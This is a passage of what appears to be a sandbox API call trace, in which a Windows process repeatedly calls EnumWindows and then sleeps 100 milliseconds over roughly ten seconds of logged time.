lParam=0x2830000) [0259.739] Sleep (dwMilliseconds=0x64) [0259.781] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.781] Sleep (dwMilliseconds=0x64) [0259.836] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.836] Sleep (dwMilliseconds=0x64) [0259.843] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.843] Sleep (dwMilliseconds=0x64) [0259.876] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.877] Sleep (dwMilliseconds=0x64) [0259.917] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.917] Sleep (dwMilliseconds=0x64) [0259.939] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.940] Sleep (dwMilliseconds=0x64) [0259.959] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0259.960] Sleep (dwMilliseconds=0x64) [0260.007] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.008] Sleep (dwMilliseconds=0x64) [0260.056] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.057] Sleep (dwMilliseconds=0x64) [0260.075] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.076] Sleep (dwMilliseconds=0x64) [0260.106] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.106] Sleep (dwMilliseconds=0x64) [0260.171] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.171] Sleep (dwMilliseconds=0x64) [0260.205] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.205] Sleep (dwMilliseconds=0x64) [0260.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.218] Sleep (dwMilliseconds=0x64) [0260.255] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.256] Sleep (dwMilliseconds=0x64) [0260.295] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.295] Sleep (dwMilliseconds=0x64) [0260.305] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.305] Sleep (dwMilliseconds=0x64) [0260.334] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.335] Sleep (dwMilliseconds=0x64) [0260.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.374] Sleep (dwMilliseconds=0x64) [0260.396] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.396] Sleep (dwMilliseconds=0x64) [0260.415] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.415] Sleep (dwMilliseconds=0x64) [0260.452] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.452] Sleep (dwMilliseconds=0x64) [0260.487] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.487] Sleep (dwMilliseconds=0x64) [0260.494] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.495] Sleep (dwMilliseconds=0x64) [0260.539] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.539] Sleep (dwMilliseconds=0x64) [0260.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.614] Sleep (dwMilliseconds=0x64) [0260.669] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.669] Sleep (dwMilliseconds=0x64) [0260.741] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.742] Sleep (dwMilliseconds=0x64) [0260.785] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.785] Sleep (dwMilliseconds=0x64) [0260.824] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.824] Sleep (dwMilliseconds=0x64) [0260.842] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.842] Sleep (dwMilliseconds=0x64) [0260.866] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.866] Sleep (dwMilliseconds=0x64) [0260.905] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.906] Sleep (dwMilliseconds=0x64) [0260.946] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.946] Sleep (dwMilliseconds=0x64) [0260.950] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.950] Sleep (dwMilliseconds=0x64) [0260.986] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0260.987] Sleep (dwMilliseconds=0x64) [0261.027] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.028] Sleep (dwMilliseconds=0x64) [0261.077] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.077] Sleep (dwMilliseconds=0x64) [0261.091] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.092] Sleep (dwMilliseconds=0x64) [0261.131] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.131] Sleep (dwMilliseconds=0x64) [0261.226] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.227] Sleep (dwMilliseconds=0x64) [0261.249] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.250] Sleep (dwMilliseconds=0x64) [0261.267] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.267] Sleep (dwMilliseconds=0x64) [0261.308] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.308] Sleep (dwMilliseconds=0x64) [0261.348] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.349] Sleep (dwMilliseconds=0x64) [0261.365] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.365] Sleep (dwMilliseconds=0x64) [0261.391] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.391] Sleep (dwMilliseconds=0x64) [0261.432] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.433] Sleep (dwMilliseconds=0x64) [0261.471] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.472] Sleep (dwMilliseconds=0x64) [0261.489] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.489] Sleep (dwMilliseconds=0x64) [0261.522] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.523] Sleep (dwMilliseconds=0x64) [0261.560] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.561] Sleep (dwMilliseconds=0x64) [0261.599] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.599] Sleep (dwMilliseconds=0x64) [0261.607] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.607] Sleep (dwMilliseconds=0x64) [0261.649] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.649] Sleep (dwMilliseconds=0x64) [0261.687] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.688] Sleep (dwMilliseconds=0x64) [0261.727] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.728] Sleep (dwMilliseconds=0x64) [0261.738] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.738] Sleep (dwMilliseconds=0x64) [0261.871] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.872] Sleep (dwMilliseconds=0x64) [0261.921] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.921] Sleep (dwMilliseconds=0x64) [0261.981] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0261.982] Sleep (dwMilliseconds=0x64) [0262.188] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.188] Sleep (dwMilliseconds=0x64) [0262.209] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.209] Sleep (dwMilliseconds=0x64) [0262.251] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.251] Sleep (dwMilliseconds=0x64) [0262.309] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.310] Sleep (dwMilliseconds=0x64) [0262.342] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.342] Sleep (dwMilliseconds=0x64) [0262.359] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.360] Sleep (dwMilliseconds=0x64) [0262.400] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.400] Sleep (dwMilliseconds=0x64) [0262.445] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.446] Sleep (dwMilliseconds=0x64) [0262.471] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.472] Sleep (dwMilliseconds=0x64) [0262.491] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.491] Sleep (dwMilliseconds=0x64) [0262.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.531] Sleep (dwMilliseconds=0x64) [0262.570] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.570] Sleep (dwMilliseconds=0x64) [0262.577] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.578] Sleep (dwMilliseconds=0x64) [0262.611] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.611] Sleep (dwMilliseconds=0x64) [0262.650] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.651] Sleep (dwMilliseconds=0x64) [0262.694] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.694] Sleep (dwMilliseconds=0x64) [0262.696] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.696] Sleep (dwMilliseconds=0x64) [0262.734] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.734] Sleep (dwMilliseconds=0x64) [0262.773] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.773] Sleep (dwMilliseconds=0x64) [0262.785] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.785] Sleep (dwMilliseconds=0x64) [0262.816] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.816] Sleep (dwMilliseconds=0x64) [0262.852] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.852] Sleep (dwMilliseconds=0x64) [0262.874] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.874] Sleep (dwMilliseconds=0x64) [0262.894] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.894] Sleep (dwMilliseconds=0x64) [0262.990] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0262.991] Sleep (dwMilliseconds=0x64) [0263.025] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.026] Sleep (dwMilliseconds=0x64) [0263.035] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.035] Sleep (dwMilliseconds=0x64) [0263.080] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.080] Sleep (dwMilliseconds=0x64) [0263.117] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.117] Sleep (dwMilliseconds=0x64) [0263.123] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.123] Sleep (dwMilliseconds=0x64) [0263.172] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.172] Sleep (dwMilliseconds=0x64) [0263.215] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.216] Sleep (dwMilliseconds=0x64) [0263.252] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.253] Sleep (dwMilliseconds=0x64) [0263.280] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.280] Sleep (dwMilliseconds=0x64) [0263.334] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.334] Sleep (dwMilliseconds=0x64) [0263.394] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.395] Sleep (dwMilliseconds=0x64) [0263.419] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.419] Sleep (dwMilliseconds=0x64) [0263.466] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.467] Sleep (dwMilliseconds=0x64) [0263.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.512] Sleep (dwMilliseconds=0x64) [0263.524] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.525] Sleep (dwMilliseconds=0x64) [0263.555] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.556] Sleep (dwMilliseconds=0x64) [0263.596] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.597] Sleep (dwMilliseconds=0x64) [0263.635] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.635] Sleep (dwMilliseconds=0x64) [0263.675] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.675] Sleep (dwMilliseconds=0x64) [0263.715] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.715] Sleep (dwMilliseconds=0x64) [0263.748] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.749] Sleep (dwMilliseconds=0x64) [0263.758] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.758] Sleep (dwMilliseconds=0x64) [0263.796] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.796] Sleep (dwMilliseconds=0x64) [0263.833] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.834] Sleep (dwMilliseconds=0x64) [0263.855] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.855] Sleep (dwMilliseconds=0x64) [0263.873] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.873] Sleep (dwMilliseconds=0x64) [0263.913] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.913] Sleep (dwMilliseconds=0x64) [0263.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.954] Sleep (dwMilliseconds=0x64) [0263.961] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.961] Sleep (dwMilliseconds=0x64) [0263.994] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0263.995] Sleep (dwMilliseconds=0x64) [0264.033] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.034] Sleep (dwMilliseconds=0x64) [0264.071] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.071] Sleep (dwMilliseconds=0x64) [0264.081] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.081] Sleep (dwMilliseconds=0x64) [0264.141] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.141] Sleep (dwMilliseconds=0x64) [0264.193] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.193] Sleep (dwMilliseconds=0x64) [0264.200] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.200] Sleep (dwMilliseconds=0x64) [0264.242] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.242] Sleep (dwMilliseconds=0x64) [0264.290] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.290] Sleep (dwMilliseconds=0x64) [0264.302] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.302] Sleep (dwMilliseconds=0x64) [0264.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.332] Sleep (dwMilliseconds=0x64) [0264.379] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.380] Sleep (dwMilliseconds=0x64) [0264.422] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.422] Sleep (dwMilliseconds=0x64) [0264.462] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.462] Sleep (dwMilliseconds=0x64) [0264.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.512] Sleep (dwMilliseconds=0x64) [0264.541] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.541] Sleep (dwMilliseconds=0x64) [0264.553] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.554] Sleep (dwMilliseconds=0x64) [0264.591] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.592] Sleep (dwMilliseconds=0x64) [0264.631] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.632] Sleep (dwMilliseconds=0x64) [0264.669] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.670] Sleep (dwMilliseconds=0x64) [0264.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.705] Sleep (dwMilliseconds=0x64) [0264.755] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.755] Sleep (dwMilliseconds=0x64) [0264.800] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.801] Sleep (dwMilliseconds=0x64) [0264.817] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.817] Sleep (dwMilliseconds=0x64) [0264.846] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.847] Sleep (dwMilliseconds=0x64) [0264.895] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.896] Sleep (dwMilliseconds=0x64) [0264.944] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.945] Sleep (dwMilliseconds=0x64) [0264.954] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.954] Sleep (dwMilliseconds=0x64) [0264.993] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0264.994] Sleep (dwMilliseconds=0x64) [0265.040] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.052] Sleep (dwMilliseconds=0x64) [0265.102] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.103] Sleep (dwMilliseconds=0x64) [0265.184] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.185] Sleep (dwMilliseconds=0x64) [0265.224] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.224] Sleep (dwMilliseconds=0x64) [0265.236] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.237] Sleep (dwMilliseconds=0x64) [0265.266] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.267] Sleep (dwMilliseconds=0x64) [0265.318] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.318] Sleep (dwMilliseconds=0x64) [0265.340] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.340] Sleep (dwMilliseconds=0x64) [0265.360] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.360] Sleep (dwMilliseconds=0x64) [0265.396] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.397] Sleep (dwMilliseconds=0x64) [0265.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.428] Sleep (dwMilliseconds=0x64) [0265.445] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.445] Sleep (dwMilliseconds=0x64) [0265.482] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.483] Sleep (dwMilliseconds=0x64) [0265.522] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.522] Sleep (dwMilliseconds=0x64) [0265.562] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.562] Sleep (dwMilliseconds=0x64) [0265.605] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.606] Sleep (dwMilliseconds=0x64) [0265.617] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.617] Sleep (dwMilliseconds=0x64) [0265.645] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.646] Sleep (dwMilliseconds=0x64) [0265.687] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.687] Sleep (dwMilliseconds=0x64) [0265.711] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.712] Sleep (dwMilliseconds=0x64) [0265.731] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.731] Sleep (dwMilliseconds=0x64) [0265.770] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.771] Sleep (dwMilliseconds=0x64) [0265.811] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.812] Sleep (dwMilliseconds=0x64) [0265.830] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.830] Sleep (dwMilliseconds=0x64) [0265.854] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.854] Sleep (dwMilliseconds=0x64) [0265.892] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.892] Sleep (dwMilliseconds=0x64) [0265.933] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.934] Sleep (dwMilliseconds=0x64) [0265.952] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.952] Sleep (dwMilliseconds=0x64) [0265.979] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0265.980] Sleep (dwMilliseconds=0x64) [0266.016] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.016] Sleep (dwMilliseconds=0x64) [0266.067] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.068] Sleep (dwMilliseconds=0x64) [0266.078] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.078] Sleep (dwMilliseconds=0x64) [0266.117] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.118] Sleep (dwMilliseconds=0x64) [0266.179] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.179] Sleep (dwMilliseconds=0x64) [0266.201] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.201] Sleep (dwMilliseconds=0x64) [0266.220] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.220] Sleep (dwMilliseconds=0x64) [0266.260] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.261] Sleep (dwMilliseconds=0x64) [0266.301] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.301] Sleep (dwMilliseconds=0x64) [0266.304] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.304] Sleep (dwMilliseconds=0x64) [0266.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.428] Sleep (dwMilliseconds=0x64) [0266.553] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.553] Sleep (dwMilliseconds=0x64) [0266.622] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.622] Sleep (dwMilliseconds=0x64) [0266.671] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.671] Sleep (dwMilliseconds=0x64) [0266.764] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.764] Sleep (dwMilliseconds=0x64) [0266.805] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.805] Sleep (dwMilliseconds=0x64) [0266.825] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.826] Sleep (dwMilliseconds=0x64) [0266.846] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.846] Sleep (dwMilliseconds=0x64) [0266.884] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.885] Sleep (dwMilliseconds=0x64) [0266.918] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.918] Sleep (dwMilliseconds=0x64) [0266.927] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.928] Sleep (dwMilliseconds=0x64) [0266.967] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0266.968] Sleep (dwMilliseconds=0x64) [0267.008] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.009] Sleep (dwMilliseconds=0x64) [0267.057] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.057] Sleep (dwMilliseconds=0x64) [0267.078] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.079] Sleep (dwMilliseconds=0x64) [0267.120] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.120] Sleep (dwMilliseconds=0x64) [0267.204] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.204] Sleep (dwMilliseconds=0x64) [0267.229] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.230] Sleep (dwMilliseconds=0x64) [0267.265] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.266] Sleep (dwMilliseconds=0x64) [0267.307] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.308] Sleep (dwMilliseconds=0x64) [0267.376] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.376] Sleep (dwMilliseconds=0x64) [0267.389] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.390] Sleep (dwMilliseconds=0x64) [0267.429] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.430] Sleep (dwMilliseconds=0x64) [0267.474] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.474] Sleep (dwMilliseconds=0x64) [0267.484] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.484] Sleep (dwMilliseconds=0x64) [0267.519] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.519] Sleep (dwMilliseconds=0x64) [0267.558] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.558] Sleep (dwMilliseconds=0x64) [0267.596] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.596] Sleep (dwMilliseconds=0x64) [0267.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.603] Sleep (dwMilliseconds=0x64) [0267.649] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.649] Sleep (dwMilliseconds=0x64) [0267.787] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.788] Sleep (dwMilliseconds=0x64) [0267.815] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.815] Sleep (dwMilliseconds=0x64) [0267.831] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.831] Sleep (dwMilliseconds=0x64) [0267.871] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.872] Sleep (dwMilliseconds=0x64) [0267.906] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.906] Sleep (dwMilliseconds=0x64) [0267.915] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.915] Sleep (dwMilliseconds=0x64) [0267.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.954] Sleep (dwMilliseconds=0x64) [0267.999] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0267.999] Sleep (dwMilliseconds=0x64) [0268.004] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.005] Sleep (dwMilliseconds=0x64) [0268.040] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.096] Sleep (dwMilliseconds=0x64) [0268.119] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.119] Sleep (dwMilliseconds=0x64) [0268.141] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.142] Sleep (dwMilliseconds=0x64) [0268.228] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.228] Sleep (dwMilliseconds=0x64) [0268.273] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.273] Sleep (dwMilliseconds=0x64) [0268.283] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.284] Sleep (dwMilliseconds=0x64) [0268.330] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.330] Sleep (dwMilliseconds=0x64) [0268.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.374] Sleep (dwMilliseconds=0x64) [0268.378] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.378] Sleep (dwMilliseconds=0x64) [0268.415] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.416] Sleep (dwMilliseconds=0x64) [0268.456] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.456] Sleep (dwMilliseconds=0x64) [0268.479] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0268.479] Sleep 